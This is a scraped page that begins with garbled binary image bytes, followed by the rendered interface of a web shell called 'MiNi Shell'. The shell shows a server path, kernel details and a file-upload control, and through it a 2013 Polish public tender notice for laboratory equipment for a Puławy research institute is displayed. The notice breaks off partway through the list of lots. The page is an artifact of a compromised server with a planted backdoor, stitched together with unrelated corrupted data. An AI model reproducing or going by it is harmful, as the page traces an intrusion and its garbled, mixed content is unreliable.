JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131114/240145-N-2013.html

<p class="kh_header"><b>Puławy: Dostawa aparatury laboratoryjnej i sprzętu laboratoryjnego</b><br>
<b>Numer ogłoszenia: 240145 - 2013; data zamieszczenia: 14.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Nawozów Sztucznych , Aleja Tysiąclecia Państwa Polskiego 13A, 24-110 Puławy, woj. lubelskie, tel. 81 473 14 00, faks 81 473 14 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ins.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa aparatury laboratoryjnej i sprzętu laboratoryjnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa aparatury laboratoryjnej i sprzętu laboratoryjnego, w tym:
Część Nr 1 
Biureta cyfrowa
Część Nr 2
Dozownik butelkowy nastawny
Część Nr 3
Dozownik butelkowy nastawny
Część Nr 4
Dozownik elektroniczny
Część Nr 5
Kriostat
Część Nr 6
Zmywarka do naczyń laboratoryjnych
Część Nr 7
Wielostanowiskowy płaszcz grzewczy
Część Nr 8
Cyfrowy, laboratoryjny miernik wieloparametrowy
Część Nr 9
Płaszcz grzewczy z płynną regulacją temperatury 
Część Nr 10
Płyta grzewcza
Część Nr 11
Płyta grzewcza z mieszadłem magnetycznym
Część Nr 12
Stacjonarny pH-metr
Część Nr 13
System do mineralizacji otwartej z wyposażeniem
Część Nr 14
Uzupełniające wyposażenie do spektrometrów firmy Varian

Wymagany Zakres oferty technicznej:
1.Potwierdzenie zakresu dostawy oraz spełnienia parametrów technicznych i wymagań zamieszczonych w specyfikacjach
2.Karty katalogowe lub charakterystyki ze szczegółową specyfikacją techniczną oferowanego urządzenia oraz oprogramowania

Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia zgodnie z wymogami określonymi w dokumentacji technicznej, zasadami wiedzy technicznej, obowiązującymi przepisami i normami a w szczególności z zachowaniem Polskich Norm, przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy.
Przedmiot zamówienia powinien odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu, oraz posiadać certyfikaty bezpieczeństwa, deklarację zgodności lub certyfikat zgodności z Polską Normą lub aprobatą techniczną.
Wszystkie pozycje stanowiące przedmiot zamówienia muszą być fabrycznie nowe.

Baza dostawy DDP Puławy, Magazyn Zamawiającego - według Incoterms 2010..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>10.6. Dopuszcza się możliwość zmiany umowy w następującym zakresie:
10.6.1. zmiana stawki i kwoty podatku VAT oraz wynagrodzenia brutto określonych w Artykule 2, odpowiednio do przepisów prawa wprowadzających zmianę.
10.6.2. terminu realizacji przedmiotu umowy, gdy jest ona spowodowana:
a) następstwem okoliczności leżących po stronie Zamawiającego takich jak utrudnienia, zawieszenia prac lub przeszkodami dającymi się przypisać Zamawiającemu,
b)koniecznością wykonania innej umowy lub czynności powiązanych z niniejszą umową,
10.6.3. treści Załącznika Nr 2 gdy jest ona spowodowana koniecznością uwzględnienia postępu technicznego, technologią wykonania, dostępnością surowców, półfabrykatów lub komponentów albo koniecznością dostosowania do obowiązujących przepisów prawa,
10.7. Strony zamienią treść w umowy w zakresie dopuszczalnych zmian w sposób następujący:
ad.10.6.2.a)- termin realizacji umowy zostanie zmieniony o czas zaistniałej okoliczności
ad.10.6.2b) -termin realizacji umowy zostanie zmieniony o czas potrzebny do wykonania innej umowy bądź czynności powiązanych z niniejszą umową.
ad.12.6.3. zmiana umowy będzie dokonana pod warunkiem, że zmiana nie powoduje pogorszenia cech przedmiotu umowy oraz nie powoduje zmiany ceny za realizację przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ins.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Nawozów Sztucznych 
Al. Tysiąclecia Państwa Polskiego 13A
24-110 Puławy
Budynek G35, pokój 201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2013 godzina 10:00, miejsce: Instytut Nawozów Sztucznych 
Al. Tysiąclecia Państwa Polskiego 13A
24-110 Puławy
Budynek E40, Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Biureta cyfrowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Biureta cyfrowa, o parametrach nie gorszych niż:
1.	Biureta cyfrowa nakręcana na butelkę.
2.	Pojemność - 50 ml.
3.	Precyzja klasy A.
4.	Funkcja oszczędzania energii - automatyczne wyłączanie.
5.	Wybór ilości cyfr po przecinku.
6.	Justowanie z systemem łatwej kalibracji.
7.	Brak konieczności przełączania urządzenia z funkcji napełniania na miareczkowanie.
8.	Możliwość ochrony związków chemicznych wrażliwych na światło.
Zakres dostawy:
1.	Biureta cyfrowa - 3 szt.
Wymagane warunki dotyczące przedmiotu zamówienia:
1)	wymagany minimalny okres gwarancji - 12 miesięcy,
2)	instrukcja obsługi w języku polskim (dostarczona wraz z dostawą przedmiotu zamówienia),
3)	bezpłatne przeglądy techniczne w okresie gwarancji,
4)	przedmiot zamówienia musi być fabrycznie nowy,
5)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn),
Wymagane przepisy i standardy
1)	Deklaracja zgodności
2)	Oznakowanie CE
3)	Certyfikat autoryzacyjny serwisu w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dozownik butelkowy nastawny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dozownik butelkowy nastawny o parametrach nie gorszych niż:
1.	Dozownik nakręcany na butelkę.
2.	Pojemność:  0,5 - 5,0 ml.
3.	Cyfrowy wskaźnik objętości.
4.	Podziałka - 0,02 ml.
5.	Zawór odpowietrzający.
6.	Bezpieczny system dozujący.
7.	Obrotowy blok zaworu (360st.).
8.	System łatwej kalibracji.
9.	Przeznaczenie - dozowanie stężonego kwasu siarkowego.
Zakres dostawy:
2.	Dozownik butelkowy nastawny - 1 szt.
Wymagane warunki dotyczące przedmiotu zamówienia:
1)	wymagany minimalny okres gwarancji - 12 miesięcy,
2)	instrukcja obsługi w języku polskim (dostarczona wraz z dostawą przedmiotu zamówienia),
3)	bezpłatne przeglądy techniczne w okresie gwarancji,
4)	przedmiot zamówienia musi być fabrycznie nowy,
5)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn)
Wymagane przepisy i standardy
1)	Deklaracja zgodności
2)	Oznakowanie CE
3)	Certyfikat autoryzacyjny serwisu w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych związanych z oferowanym urządzeniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dozownik butelkowy nastawny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dozownik butelkowy nastawny o parametrach nie gorszych niż:
1.	Dozownik nakręcany na butelkę.
2.	Pojemność - 2,5 - 25,0 ml.
3.	Cyfrowy wskaźnik objętości.
4.	Podziałka - 0,1 ml.
5.	Zawór odpowietrzający.
6.	Bezpieczny system dozujący.
7.	Obrotowy blok zaworu (360st.).
8.	System łatwej kalibracji.
9.	Przeznaczenie - dozowanie roztworów soli.
Zakres dostawy:
3.	Dozownik butelkowy nastawny - 2 szt.
Wymagane warunki dotyczące przedmiotu zamówienia:
1)	wymagany minimalny okres gwarancji - 12 miesięcy,
2)	instrukcja obsługi w języku polskim (dostarczona wraz z dostawą przedmiotu zamówienia),
3)	bezpłatne przeglądy techniczne w okresie gwarancji,
4)	przedmiot zamówienia musi być fabrycznie nowy,
5)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn),
Wymagane przepisy i standardy
1)	Deklaracja zgodności
2)	Oznakowanie CE
3)	Certyfikat autoryzacyjny serwisu w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych związanych z oferowanym urządzeniem,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dozownik elektroniczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dozownik elektroniczny o parametrach nie gorszych niż:
1.	Dozownik ręczny - elektroniczny.
2.	Funkcja dozowania.
3.	Funkcja automatycznego dozowania.
4.	Funkcja pipetowania.
5.	W zestawie - akumulator.
6.	W zestawie - ładowarka.
7.	W zestawie - zasilacz do ładowarki.
8.	W zestawie - niesterylne końcówki pojemności 50 ml.
9.	Wyświetlacz z licznikiem ilości skoków.
10.	Rozpoznawanie rodzaju końcówek tego samego producenta.
11.	Możliwość pracy z innymi końcówkami dostępnymi na rynku.
12.	Możliwość ustawiania niezależnie od siebie prędkości poboru i dozowania.
Zakres dostawy:
1.	Dozownik elektroniczny - 1 komplet
Wymagane warunki dotyczące przedmiotu zamówienia:
1)	wymagany minimalny okres gwarancji - 12 miesięcy,
2)	instrukcja obsługi w języku polskim (dostarczona wraz z dostawą przedmiotu zamówienia),
3)	bezpłatne przeglądy techniczne w okresie gwarancji,
4)	przedmiot zamówienia musi być fabrycznie nowy,
5)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn),
Wymagane przepisy i standardy
1)	Deklaracja zgodności
2)	Oznakowanie CE
3)	Certyfikat autoryzacyjny serwisu w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych związanych z oferowanym urządzeniem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kriostat.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kriostat z  zewnętrzną sondą PT100 oraz z odpowiednią cieczą chłodzącą o parametrach nie gorszych niż:
1.	Temperatura pracy od -30st.C do +200st.C.
2.	Stabilność min. plus/minus 0,02st.C.
3.	Pojemność komory min. 15 dm3.
4.	Wymiary otworu min. 200 x 270 mm.
5.	Głębokość komory min. 140 mm.
6.	Wydajność pompy min. 16 dm3/min.
7.	Płynna regulacja wydajności.
8.	Wyświetlacz kolorowy, dotykowy min. 4,3cala.
9.	Pięciopunktowa kalibracja.
10.	Możliwość programowania czasu i temperatury,
11.	Port RS232/RS485 (opcja), USB, Ethernet.
12.	Złącze do podłączenia zewnętrznej sondy temperatury PT100.
13.	Blat o wysokiej odporności chemicznej.
14.	System ochrony środowiska - zmniejszający głośność pracy do poziomu normalnej rozmowy w odległości 2 m od urządzenia.
15.	Układ regulacji wydajności chłodzenia - zmniejszający zużycie energii, zwłaszcza podczas szybkiego obniżania temperatury,
16.	Alarmy i układy chroniące przed przegrzaniem, zbyt niskim poziomem płynu czy uszkodzeniem kontrolera temperatury
Zakres dostawy:
1.	Kriostat z  zewnętrzną sondą PT100 oraz z odpowiednią cieczą chłodzącą - 1 komplet
Wymagane warunki dotyczące przedmiotu zamówienia:
1)	wymagany minimalny okres gwarancji - 24 miesięcy,
2)	instrukcja obsługi w języku polskim (dostarczona wraz z dostawą przedmiotu zamówienia),
3)	bezpłatne przeglądy techniczne w okresie gwarancji,
4)	przedmiot zamówienia musi być fabrycznie nowy,
5)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn),
6)	instalacja i szkolenie przez dostawcę urządzenia musi zawierać się w cenie oferty,
Wymagane przepisy i standardy
4)	Deklaracja zgodności
5)	Oznakowanie CE
6)	Certyfikat autoryzacyjny serwisu w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych związanych z oferowanym urządzeniem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zmywarka do naczyń laboratoryjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zmywarka do naczyń laboratoryjnych o parametrach nie gorszych niż:
1.	Automat myjąco-dezynfekujący z agregatem suszącym
2.	Temperatura procesu mycia i dezynfekcji nie mniej niż 90st.C
3.	Kontrola temperatury wewnątrz urządzenia przy pomocy dwóch niezależnych sensorów
4.	Pojemność użytkowa komory 150 L (+/-10%)
5.	Komora i jej elementy wykonane ze stali nierdzewnej wysokogatunkowej (ANSI 316L; DIN 1.4404)
6.	Dwa niezależne poziomy mycia
7.	Efektywne poziomy mycia w komorze nie mniej niż 170 mm dla każdego z dwóch poziomów
8.	Teleskopowe szyny w koszach (wózkach)
9.	Możliwość zastosowania w przyszłości dowolnych wózków iniekcyjnych (dedykowanych do urządzenia) oraz  podstawowych  na dwóch poziomach - niezależnie od siebie; możliwość mycia za pomocą iniekcji tylko na jednym poziomie (góra lub dół) bez konieczności umieszczenia wózka na nieużywanym poziomie, bezpośrednie sprzężenie wózka z tyłem komory zmywarki zapewniające optymalne wykorzystanie przestrzeni (nie dopuszcza się rozwiązań dostarczających wodę i gorące powietrze z góry komory do dolnego wózka iniekcyjnego)
10.	Urządzenie wyposażone w co najmniej 40 programów, w tym co najmniej 20 programów w pełni modyfikowalnych przez Użytkownika
11.	Co najmniej dwa przyciski dedykowane do  najpopularniejszych programów zapewniający łatwy wybór (jedno kliknięcie)
12.	Wbudowany zmiękczacz wody
13.	Wbudowany kondensator pary
14.	System skraplania pary nie powodujący wydostania się zapachów na zewnątrz
15.	W standardzie dwie automatyczne pompy dozujące płyny z opcją zamontowania trzeciej pompy
16.	Urządzenie wyposażone w dwa dozowniki dla środków myjących (detergent oraz neutralizator) w płynie
17.	 System aktywnego suszenia z wykorzystaniem agregatu suszącego, o przepływie powietrza nie mniej niż 150m3/h
18.	Pompa recyrkulacyjna o mocy nie mniejszej niż 550 W
19.	Wyświetlacz LCD
20.	Interfejs RS 232 do ustawiania i monitoringu poszczególnych faz procesu mycia
21.	Oszczędne zużycie wody, poniżej 14  l/cykl
22.	Promieniowanie cieplne urządzenia 330W (+/-100 W)
23.	Poziom hałasu nie więcej niż 56 dB
24.	Dopuszczalna temperatura pracy urządzenia +5st.C do +40st.C
25.	Wymiary zewnętrzne nie większe niż (wys. x szer. x gł.) 840 x 600 x 630cm
26.	Waga urządzenia nie więcej niż 86 kg
27.	Moc urządzenia nie więcej niż 5600 W
28.	Zasilanie 400V/ 3 fazowe
Zakres dostawy:
1.	Zmywarka do naczyń laboratoryjnych - 1szt.,
2.	Kosz (wózek) dolny podstawowy - 1 szt.,
3.	Kosz dolny przeznaczony do mycia przynajmniej 100 pipet miarowych - 1 szt.,
4.	Kosz górny iniekcyjny z co najmniej 25 dyszami umożliwiającymi przy pełnym załadunku mycie  naczyń laboratoryjnych o fi ok. 90mm (kolby, butelki) - 1 szt.,
5.	Wkład ?  kosza podstawowego, na średnie szkło ( kolby Erlenmeyera, zlewki, butelki) - 2 szt.,
6.	Koszyk siatkowy ? kosza podstawowego, na korki i drobny sprzęt laboratoryjny - 2 szt.
Wymagane warunki dotyczące przedmiotu zamówienia:
6)	wymagany minimalny okres gwarancji - 24 miesięcy,
7)	instrukcja obsługi w języku polskim (dostarczona wraz z dostawą przedmiotu zamówienia),
8)	bezpłatne przeglądy techniczne w okresie gwarancji,
9)	przedmiot zamówienia musi być fabrycznie nowy,
10)	instalacja i szkolenie przez dostawcę urządzenia musi zawierać się w cenie oferty,
11)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn),
Wymagane przepisy i standardy
7)	Deklaracja zgodności
8)	Oznakowanie CE
9)	Certyfikat autoryzacyjny serwisu w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych związanych z oferowanym urządzeniem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wielostanowiskowy płaszcz grzewczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wielostanowiskowy płaszcz grzewczy o parametrach nie gorszych niż:
1.	Ilość stanowisk - 3.
2.	Stanowiska grzania przeznaczone do kolb pojemności 1000 ml.
3.	Wbudowane regulatory mocy grzejnej indywidualnie dla każdego stanowiska.
